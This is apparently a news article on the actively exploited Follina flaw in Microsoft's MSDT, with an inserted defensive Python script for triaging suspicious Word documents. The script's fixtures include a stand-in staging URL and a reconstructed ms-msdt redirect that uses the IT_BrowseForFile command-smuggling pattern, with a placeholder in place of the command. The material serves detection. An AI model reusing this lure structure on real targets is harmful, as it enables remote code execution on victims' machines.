Researchers warned last weekend that a flaw in Microsoft’s Support Diagnostic Tool could be exploited through malicious Word documents to take remote control of target devices. Microsoft published guidance Monday, including temporary defensive measures, and on Tuesday the United States Cybersecurity and Infrastructure Security Agency warned that “a remote, unauthenticated attacker could exploit this vulnerability”, known as Follina, “to take control of an affected system”. But Microsoft wouldn’t say when, or whether, a patch is coming, even though the company acknowledged the flaw was being actively exploited in the wild. When asked by WIRED, the company still had no comment on the possibility of an out-of-band patch.
The Follina vulnerability in the Microsoft Support Diagnostic Tool (MSDT), tracked as CVE-2022-30190, can be triggered by a specially crafted Word document. The decoy carries a reference to a remote template: when the document is opened, Word fetches a malicious HTML file from the attacker’s server, and that HTML invokes the ms-msdt: URI handler, which ultimately lets the attacker execute PowerShell commands on the victim’s Windows machine. The researchers say they would describe the bug as a “zero-day”, a previously unknown vulnerability, but Microsoft has not classified it as such.
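As an added example (not code from the article or from any of the researchers it quotes), the following Python script triages the two stages described above: it inspects a .docx’s relationship parts for an external oleObject or attachedTemplate target fetched over http(s), and checks a fetched HTML payload for the ms-msdt: handoff. The .docx and the HTML are constructed inline, with a harmless placeholder in place of a real command, so it runs offline; the staging URL and relationship IDs are assumptions.

```python
"""Triage helpers for Follina-style Office lures (added example, not from the article).

Stage 1: the decoy .docx references a remote template or OLE object over http(s),
         recorded in a .rels part with TargetMode="External".
Stage 2: the fetched HTML redirects to an ms-msdt: URI that launches the diagnostic
         tool with an attacker-controlled IT_BrowseForFile parameter.
Sample inputs below are constructed; the URL is an assumption, not a real host.
"""
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_RELS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types Word resolves on open without user interaction
# (a hyperlink needs a click, so it is deliberately excluded).
AUTO_FETCH_TYPES = {"oleObject", "attachedTemplate"}


def find_remote_relationships(docx_bytes: bytes) -> list[dict]:
    """Return every auto-fetched relationship in any .rels part whose target is an http(s) URL."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                target = rel.get("Target", "")
                if (rel.get("TargetMode") == "External"
                        and rel_type in AUTO_FETCH_TYPES
                        and re.match(r"(?i)https?://", target)):
                    hits.append({"part": name, "id": rel.get("Id"),
                                 "type": rel_type, "target": target})
    return hits


def msdt_indicators(html: str) -> dict:
    """Flag the ms-msdt: handoff in fetched HTML and pull out the diagnostic package id."""
    m = re.search(r"ms-msdt:\s*/id\s+(\w+)", html, re.IGNORECASE)
    return {
        "msdt_uri": m is not None,
        "diag_id": m.group(1) if m else None,
        # IT_BrowseForFile is the parameter the in-the-wild payload abused to smuggle
        # a $(...) PowerShell expression into the diagnostic package.
        "browse_for_file": bool(re.search(r"IT_BrowseForFile\s*=", html, re.IGNORECASE)),
    }


def build_sample_docx(external_target: str | None) -> bytes:
    """Constructed minimal .docx; with external_target set, document.xml.rels carries an external oleObject."""
    rels = [f'<Relationship Id="rId1" Type="{OFFICE_RELS}styles" Target="styles.xml"/>']
    if external_target:
        rels.append(f'<Relationship Id="rId5" Type="{OFFICE_RELS}oleObject" '
                    f'Target="{external_target}" TargetMode="External"/>')
    rels_xml = (f'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
                f'<Relationships xmlns="{RELS_NS}">{"".join(rels)}</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


# Constructed stand-in for the second stage. The real payload padded the page with a
# large comment and hid a base64 PowerShell command inside IT_BrowseForFile=$(...);
# here a harmless placeholder stands in for the command.
SAMPLE_HTML = """<!doctype html><html><body><script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_BrowseForFile=$(placeholder)i/../../../../Windows/System32/mpsigstub.exe\\"";
</script></body></html>"""

# The trailing "!" on the template URL was present in the original in-the-wild lure.
SAMPLE_URL = "http://stage.example.invalid/follina.html!"  # assumption: not a real host


def triage(docx_bytes: bytes, fetched_html: str) -> dict:
    """Combine both checks into one verdict for a document and the page it would fetch."""
    remote = find_remote_relationships(docx_bytes)
    html = msdt_indicators(fetched_html)
    return {"remote_fetch": remote, "html": html,
            "suspicious": bool(remote) and html["msdt_uri"]}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(build_sample_docx(SAMPLE_URL), SAMPLE_HTML), indent=2))
    print(json.dumps(triage(build_sample_docx(None), "<html>benign</html>"), indent=2))
```

On a real sample, feed `find_remote_relationships` the bytes of the .docx and `msdt_indicators` the content fetched from the URL it reports (in a sandbox); a document that pulls an external oleObject or template is already worth quarantining even before the second stage is retrieved.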
“Once the public became aware of the exploit, we started to see an immediate response from various attackers starting to use it,” says Tom Hegel, senior threat researcher at security firm SentinelOne. He adds that while attackers have mainly been seen exploiting the flaw via malicious documents so far, researchers have also discovered other methods, including manipulating HTML content in network traffic.
“While the malicious documents approach is very concerning, the less documented methods by which the exploit can be triggered are troubling until they are fixed,” says Hegel. “I would expect opportunistic and targeted threat actors to use this vulnerability in a variety of ways when the option is available – it’s just too easy.”
The vulnerability is present in all supported versions of Windows and can be exploited through Microsoft Office 365, Office 2013 through 2019, Office 2021 and Office ProPlus. The main mitigation Microsoft has offered is to disable the MSDT URL protocol handler (by backing up and then deleting the HKEY_CLASSES_ROOT\ms-msdt registry key) and to rely on Microsoft Defender Antivirus to detect and block the exploit.
But incident responders say more action is needed, given how easily the vulnerability can be exploited and the amount of malicious activity detected.
“We see a variety of APT actors integrating this technique into longer infection chains that use the Follina vulnerability,” says Michael Raggi, threat researcher at security firm Proofpoint, who focuses on hackers backed by the Chinese government. “For example, on May 30, 2022, we observed the Chinese APT actor TA413 send a malicious URL in an email impersonating the Central Tibetan Administration. Different actors slot Follina-related files into different stages of their infection chain, depending on their pre-existing toolkit and the tactics deployed.”
Researchers have also seen malicious documents using Follina against targets in Russia, India, the Philippines, Belarus and Nepal. An undergraduate researcher first noticed the flaw in August 2020, but it was first reported to Microsoft on April 21. The researchers also note that Follina attacks are particularly useful to attackers because they work from malicious documents without relying on macros, the widely abused Office feature that Microsoft has been trying to rein in.
“Proofpoint has identified a variety of actors incorporating the Follina vulnerability into phishing campaigns,” said Sherrod DeGrippo, vice president of threat research at Proofpoint.
With all of this real-world exploitation, the question is whether the advice Microsoft has published so far is adequate and proportionate to the risk.
“Security teams might take Microsoft’s nonchalant approach as a sign that this is just ‘one more vulnerability,’ which it certainly isn’t,” says Jake Williams, director of cyber threat intelligence at security firm Scythe. “It’s unclear why Microsoft continues to downplay this vulnerability, especially when it’s being actively exploited in the wild.”
This story originally appeared on wired.com.